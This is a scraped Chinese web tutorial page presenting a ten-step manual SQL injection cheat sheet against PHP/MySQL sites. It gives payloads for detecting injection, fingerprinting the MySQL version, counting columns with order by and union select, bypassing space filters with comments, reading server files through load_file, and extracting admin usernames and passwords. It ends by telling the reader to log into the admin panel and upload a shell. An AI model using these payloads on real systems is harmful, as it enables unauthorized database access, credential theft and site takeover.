All articles| All Pictures| All Softwares| All Video| Go home page| Write articles| Upload pictures

Reading number is top 10 articles
在动态网页技术PHP5中类(CLASS)的新特征_php资料_编程技术
如何在十天学内会php之第三天_php资料_编程技术
判断远程图片是否存在_[XML教程]
IIS运行不了ASP.NET的解决办法_[Asp.Net教程]
dotnet下生成简单sql语句_[Asp.Net教程]
教你用PHP写MySQL数据库的用户认证系统_[PHP教程]
根据IP获取当地天气预报的实现_[Asp.Net教程]
规范设计数据库应注意的14个技巧_[SQL Server教程]
GridView实现全选及删除源代码_[Asp.Net教程]
通过PHP连接MYSQL数据库、创建数据库、创建表_[PHP教程]
Reading number is top 10 pictures
赵惟依写真2
西游四格漫画(四)
这两天,中国人民到处都可以“看海”了
Sora aoi in China1
mythology hero1
India's national beauty of the college students
西游四格漫画(六)
Sell the barbecue as says father du breul2
Li Zongrui hunting video screenshots2
XuYing poker perspective garment debut
Download software ranking
Unix video tutorial1
Tram sex maniac 2 (H) rar bag8
Tram sex maniac 2 (H) rar bag4
卡丁车单机版
天龙八部最新服务端
Boxer's Top ten classic battle4
Ashlynn Video3
Jinling thirteen stock
asp.netWeb服务器高级编程
Unix video tutorial2
aaa published in(发表于) 2013/12/24 5:51:00 Edit(编辑)
PHP程序安全基础:手工php注入总结_php资料_编程技术

PHP程序安全基础:手工php注入总结_php资料_编程技术

PHP程序安全基础:手工php注入总结_php资料_编程技术-你的首页-uuhomepage.com

1.判断是否存在注入,加';and 1=1;and 1=2

2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询

3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10

4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。

5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。

6.如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。

7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,说明存在这个表。

8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。

9.同理再猜解password字段,猜解成功再找后台登录。

10.登录后台,上传shell。





添加到del.icio.us 添加到新浪ViVi 添加到百度搜藏 添加到POCO网摘 添加到天天网摘365Key 添加到和讯网摘 添加到天极网摘 添加到黑米书签 添加到QQ书签 添加到雅虎收藏 添加到奇客发现 diigo it 添加到饭否 添加到飞豆订阅 添加到抓虾收藏 添加到鲜果订阅 digg it 貼到funP 添加到有道阅读 Live Favorites 添加到Newsvine 打印本页 用Email发送本页 在Facebook上分享


Disclaimer Privacy Policy About us Site Map

If you have any requirements, please contact webmaster。(如果有什么要求,请联系站长)
Copyright ©2011-
uuhomepage.com, Inc. All rights reserved.